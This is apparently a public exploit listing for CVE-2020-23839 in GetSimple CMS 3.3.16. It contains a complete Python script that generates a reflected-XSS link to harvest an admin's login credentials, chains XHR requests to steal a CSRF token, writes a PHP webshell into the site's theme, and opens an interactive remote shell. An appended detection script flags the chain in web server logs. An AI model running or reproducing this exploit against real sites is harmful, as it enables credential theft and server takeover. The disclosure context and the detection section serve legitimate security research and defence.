
GetSimple CMS 3.3.16 Cross Site Scripting / Shell Upload

Posted Mar 30, 2021
Authored by Bobby Cooke

GetSimple CMS version 3.3.16 cross site scripting to remote shell upload exploit.

tags | exploit, remote, shell, xss
advisories | CVE-2020-23839
SHA-256 | ff447b6110d359109791159d602b028e64b080305d8c9119c22a55bb1534f865

# Exploit Title: GetSimple CMS 3.3.16 - Reflected XSS to RCE
# Exploit Author: Bobby Cooke (boku)
# Discovery Credits: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
# Date: March 29th, 2021
# CVE ID: CVE-2020-23839 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-23839
# Vendor Homepage: http://get-simple.info
# Software Link: http://get-simple.info/download/
# Version: v3.3.16
# Tested against Server Host: Windows 10 Pro + XAMPP
# Tested against Client Browsers: Firefox(Linux), Chrome (Linux & Windows), Edge
# Full Disclosure & Information at: https://github.com/boku7/CVE-2020-23839

# Vulnerability Description:
# GetSimple CMS v3.3.16 suffers from a Reflected XSS on the Admin Login Portal. On August 12th, 2020, the vendor received full disclosure details of the vulnerability via private email. The vulnerability was publicly disclosed on September 13th, 2020 via MITRE with the publication of CVE-2020-23839, which contained few details and no proof of concept. On January 20th, 2021, full disclosure and code analysis were published under the GetSimple CMS GitHub active issues ticket.
# Exploit Description:
# This exploit creates a Reflected XSS payload, in the form of a hyperlink, which exploits CVE-2020-23839. When an Administrator of the GetSimple CMS system goes to this URL in their browser and enters their credentials, an exploitation attack chain is launched in their browser which gives the remote attacker Remote Code Execution on the server that hosts the GetSimple CMS system.
# Attack Chain:
# 1. Attacker tricks GetSimple CMS Admin to go to the URL provided from this exploit
# 2. Admin then enters their credentials into the GetSimple CMS login portal
# 3. The Reflected XSS payload is reflected into the login form's action as a javascript: URL, so it fires when the Admin clicks the Submit button or presses Enter
# 4. The XSS payload performs an XHR POST request in the background, which logs the browser into the GetSimple CMS Admin panel
# 5. The XSS payload then performs a 2nd XHR GET request to admin/theme-edit.php, and collects the CSRF Token & the name of the theme template configured for the webpages hosted on the CMS
# 6. The XSS payload then performs a 3rd XHR POST request to admin/theme-edit.php, which overwrites that theme template with a PHP backdoor WebShell, so every page of the CMS renders it
# 7. The exploit repeatedly attempts to connect to the public /index.php page of the target GetSimple CMS system until a WebShell is returned
# 8. When the exploit hooks to the WebShell, an interactive PHP WebShell appears in the attackers console

import sys,re,argparse,requests
import urllib3
from urllib.parse import quote
from colorama import (Fore as F, Back as B, Style as S)
from time import sleep

# verify=False is used below; silence the InsecureRequestWarning for HTTPS targets
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# colorama shorthands used for the console output
FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT

def bullet(char,color):
    # coloured "[x]" status prefix: 'B' blue, 'R' red, anything else green
    C=FB if color == 'B' else FR if color == 'R' else FG
    return SB+C+'['+ST+SB+char+SB+C+']'+ST+' '
info,err,ok = bullet('-','B'),bullet('-','R'),bullet('+','G')

def webshell(SERVER_URL):
    # Once the XHR chain has replaced the theme template with the backdoor, the public
    # front page renders nothing but the output of shell_exec($_REQUEST['FierceGodKick']).
    # 'echo %CD%' is Windows-specific, matching the tested Windows 10 + XAMPP host.
    try:
        WEB_SHELL = SERVER_URL
        getdir = {'FierceGodKick': 'echo %CD%'}
        r = requests.post(url=WEB_SHELL, data=getdir, verify=False)
        status = r.status_code
        # A Windows drive path at the start of a line (e.g. C:\xampp\htdocs\...) is the
        # sign the shell answered; matching any line containing C/D/E/F would also fire on
        # the untouched HTML front page and open a prompt before the backdoor exists.
        cwd = re.findall(r'^[A-Za-z]:\\.*', r.text, re.M)
        if cwd:
            cwd = cwd[0].strip()+"> "
            term = SB+FG+cwd+FT
            print(SD+FR+')'+FY+'+++++'+FR+'['+FT+'=========>'+ST+SB+' WELCOME BOKU '+ST+SD+'<========'+FR+']'+FY+'+++++'+FR+'('+FT+ST)
            # interactive loop: every line typed is sent as the FierceGodKick parameter
            while True:
                thought = input(term)
                command = {'FierceGodKick': thought}
                r = requests.post(WEB_SHELL, data=command, verify=False)
                status = r.status_code
                if status != 200:
                    r.raise_for_status()
                response = r.text
                print(response)
        else:
            r.raise_for_status()
    except requests.RequestException:
        # target unreachable, non-200 answer or shell not installed yet: caller keeps polling
        pass

def urlEncode(javascript):
    return quote(javascript)

def genXssPayload():
    # Path info appended to admin/index.php. The reflected value ends up as the login
    # form's action, so the browser evaluates it as a javascript: URL when the admin submits.
    XSS_PAYLOAD = '/index/javascript:'
    # No literal '/' appears in the JavaScript (it would be read as a path separator);
    # slashes are rebuilt at run time from a percent-encoded form.
    XSS_PAYLOAD += 'var s = decodeURIComponent("%2f");'
    XSS_PAYLOAD += 'var h = "application"+s+"x-www-form-urlencoded";'
    XSS_PAYLOAD += 'var e=function(i){return encodeURIComponent(i);};'
    # credential harvest: the username and password the admin just typed into the form
    XSS_PAYLOAD += 'var user = document.forms[0][0].value;'
    XSS_PAYLOAD += 'var pass = document.forms[0][1].value;'
    XSS_PAYLOAD += 'var u1 = s+"admin"+s;'
    XSS_PAYLOAD += 'var u2 = u1+"theme-edit.php";'
    XSS_PAYLOAD += 'var xhr1 = new XMLHttpRequest();'
    XSS_PAYLOAD += 'var xhr2 = new XMLHttpRequest();'
    XSS_PAYLOAD += 'var xhr3 = new XMLHttpRequest();'
    # xhr1: log the browser in with the harvested credentials (same origin, session cookie kept)
    XSS_PAYLOAD += 'xhr1.open("POST",u1,true);'
    XSS_PAYLOAD += 'xhr1.setRequestHeader("Content-Type", h);'
    XSS_PAYLOAD += 'params = "userid="+user+"&pwd="+pass+"&submitted=Login";'
    XSS_PAYLOAD += 'xhr1.onreadystatechange = function(){'
    XSS_PAYLOAD += 'if (xhr1.readyState == 4 && xhr1.status == 200) {'
    # xhr2: fetch theme-edit.php as a DOM to read the CSRF nonce and the active template name
    XSS_PAYLOAD += 'xhr2.onreadystatechange = function(){'
    XSS_PAYLOAD += 'if (xhr2.readyState == 4 && xhr2.status == 200) {'
    XSS_PAYLOAD += 'r=this.responseXML;'
    XSS_PAYLOAD += 'nVal = r.querySelector("#nonce").value;'
    XSS_PAYLOAD += 'eVal = r.forms[1][2].defaultValue;'
    # xhr3: overwrite the template with the PHP backdoor, authorised by the stolen nonce
    XSS_PAYLOAD += 'xhr3.open("POST",u2,true);'
    XSS_PAYLOAD += 'xhr3.setRequestHeader("Content-Type", h);'
    XSS_PAYLOAD += 'payload=e("<?php echo shell_exec($_REQUEST[FierceGodKick]) ?>");'
    XSS_PAYLOAD += 'params="nonce="+nVal+"&content="+payload+"&edited_file="+eVal+"&submitsave=Save+Changes";'
    XSS_PAYLOAD += 'xhr3.send(params);'
    XSS_PAYLOAD += '}};'
    XSS_PAYLOAD += 'xhr2.open("GET",u2,true);'
    XSS_PAYLOAD += 'xhr2.responseType="document";'
    XSS_PAYLOAD += 'xhr2.send();'
    XSS_PAYLOAD += '}};'
    XSS_PAYLOAD += 'xhr1.send(params);'
    # decoded by the browser to "//": comments out whatever the page appends after the reflection
    XSS_PAYLOAD += '%2f%2f'
    return XSS_PAYLOAD

def argsetup():
    about = SB+FT+'This exploit creates a Reflected XSS payload, in the form of a hyperlink, which exploits CVE-2020-23839. When an Administrator of the GetSimple CMS system goes to this URL in their browser and enters their credentials, an exploitation attack chain is launched in their browser which gives the remote attacker Remote Code Execution on the server that hosts the GetSimple CMS system.'+ST
    parser = argparse.ArgumentParser(description=about)
    # the scheme is required: the same value is used as the URL the webshell is polled on
    parser.add_argument('TargetSite',type=str,help='Base URL of the target site, scheme included (e.g. http://target.tld)')
    args = parser.parse_args()
    return args

if __name__ == "__main__":
    print(SB+FB+'Exploit Author'+FT+': '+FB+'Bobby Cooke'+FT+FB)
    print(SB+FR+' CVE-2020-23839 '+FT+'|'+FR+' GetSimpleCMS v3.3.16 '+FT)
    print(FR+'Reflected XSS '+FT+'->'+FR+' CredHarvest Payload '+FT+'->'+FR+' XHR Chaining '+FT+'->'+FR+' RCE'+ST)
    args = argsetup()
    RHOST = args.TargetSite.rstrip('/')
    WEBAPP_URL = RHOST+'/admin/'
    WEBAPP_URL = WEBAPP_URL+'index.php'
    PAYLOAD = genXssPayload()
    ENCODED_PAYLOAD = urlEncode(PAYLOAD)
    print(info+FT+'Have a '+SB+FB+'GetSimpleCMS '+SB+FC+'Admin '+ST+'go to this '+SB+FM+'URL & login'+ST+', and you will get an '+SB+FR+'RCE WebShell'+ST)
    print(SB+FB+WEBAPP_URL+ENCODED_PAYLOAD+ST)
    sleep(1)
    print(ok+'Waiting for Admin to login with creds, which will trigger the RCE XHR attack chain..')
    # poll the public front page until the backdoored template answers, then drop into the shell
    try:
        while True:
            sleep(1)
            webshell(RHOST)
    except KeyboardInterrupt:
        sys.exit(err+'Interrupted')
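The attack chain in the header above leaves a recognisable trail in the web server's access log, and the following Python, added here as an example that is not part of the exploit or of GetSimple, flags it: the crafted admin/index.php link of step 1, the theme-edit.php write of step 6, and the attacker's polling of the front page in step 7. The log lines, IP addresses and indicator names are constructed for the example. Steps 1 through 6 are issued by the victim admin's browser, so those requests carry the admin's address, not the attacker's; only the front-page POSTs come from the attacker.

```python
import html
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Constructed Apache combined-log lines (not captured traffic). 203.0.113.7 is the victim
# admin's browser: it opens the crafted link, then its XHR chain logs in and reads and
# writes theme-edit.php. 192.0.2.55 is the attacker polling the front page for the shell.
# 198.51.100.9 is an ordinary admin session that edits a template legitimately.
SAMPLE_LOG = r'''
203.0.113.7 - - [29/Mar/2021:10:01:02 +0000] "GET /admin/index.php/index/javascript%3Avar%20s%20%3D%20decodeURIComponent%28%22%252f%22%29%3B%252f%252f HTTP/1.1" 200 4183 "-" "Mozilla/5.0"
203.0.113.7 - - [29/Mar/2021:10:01:40 +0000] "POST /admin/ HTTP/1.1" 302 0 "http://cms.example/admin/index.php" "Mozilla/5.0"
203.0.113.7 - - [29/Mar/2021:10:01:41 +0000] "GET /admin/theme-edit.php HTTP/1.1" 200 9012 "-" "Mozilla/5.0"
203.0.113.7 - - [29/Mar/2021:10:01:42 +0000] "POST /admin/theme-edit.php HTTP/1.1" 200 9100 "-" "Mozilla/5.0"
192.0.2.55 - - [29/Mar/2021:10:01:43 +0000] "POST / HTTP/1.1" 200 31 "-" "python-requests/2.25.1"
192.0.2.55 - - [29/Mar/2021:10:01:50 +0000] "POST / HTTP/1.1" 200 1288 "-" "python-requests/2.25.1"
198.51.100.9 - - [29/Mar/2021:10:05:00 +0000] "GET /admin/index.php HTTP/1.1" 200 4183 "-" "Mozilla/5.0"
198.51.100.9 - - [29/Mar/2021:10:06:00 +0000] "POST /admin/theme-edit.php HTTP/1.1" 200 9100 "-" "Mozilla/5.0"
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# path info after the admin login script, up to any query string (sub-directory installs too)
ADMIN_LOGIN_RE = re.compile(r'/admin/index\.php(?P<info>/[^?]*)', re.I)


def decoded_path_info(target):
    """Path info appended to admin/index.php, decoded the way the victim's browser will see it.

    The web server percent-decodes the URL once (that text is what gets reflected); the
    browser HTML-decodes the reflected attribute and then percent-decodes the javascript:
    URL body before running it, which is why the exploit double-encodes its slashes.
    Whitespace and control characters are dropped because browsers ignore them in a scheme."""
    m = ADMIN_LOGIN_RE.search(target)
    if not m:
        return None
    text = unquote(html.unescape(unquote(m.group('info'))))
    return re.sub(r'[\x00-\x20]', '', text).lower()


def classify(method, target):
    """Indicators for one request line. None of them alone proves exploitation."""
    tags = set()
    info = decoded_path_info(target)
    if info is not None and 'javascript:' in info:
        tags.add('login-xss-probe')        # the CVE-2020-23839 link shape
    path = target.split('?', 1)[0].lower()
    if method == 'POST' and path.endswith('/admin/theme-edit.php'):
        tags.add('theme-template-write')   # step 6 of the chain, but also legitimate admin use
    if method == 'POST' and path in ('/', '/index.php'):
        tags.add('front-page-post')        # the public page takes no forms; the webshell does
    return tags                            # (adjust the two paths for sub-directory installs)


def scan_log(text):
    """Per source IP, how many times each indicator fired."""
    per_ip = defaultdict(Counter)
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                       # not combined-log format: skip rather than guess
        for tag in classify(m['method'], m['target']):
            per_ip[m['ip']][tag] += 1
    return dict(per_ip)


def victims(text):
    """Admin browsers that opened the crafted link and then wrote a theme template."""
    return sorted(ip for ip, c in scan_log(text).items()
                  if c['login-xss-probe'] and c['theme-template-write'])


def shell_clients(text, min_posts=2):
    """Sources repeatedly POSTing to the public front page: the exploit's webshell polling."""
    return sorted(ip for ip, c in scan_log(text).items()
                  if c['front-page-post'] >= min_posts)


if __name__ == '__main__':
    print('victim admin browsers:', victims(SAMPLE_LOG))
    print('webshell clients:     ', shell_clients(SAMPLE_LOG))
```

The probe indicator is the high-confidence one: a javascript: scheme inside path info of the admin login script has no legitimate use. A theme write on its own is normal administration, so it only raises an alert when the same browser address produced a probe earlier; treat that address as a compromised admin session and the template file as tampered. The front-page POST count is the attacker-side signal, and the GetSimple front page never expects a POST body at all.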

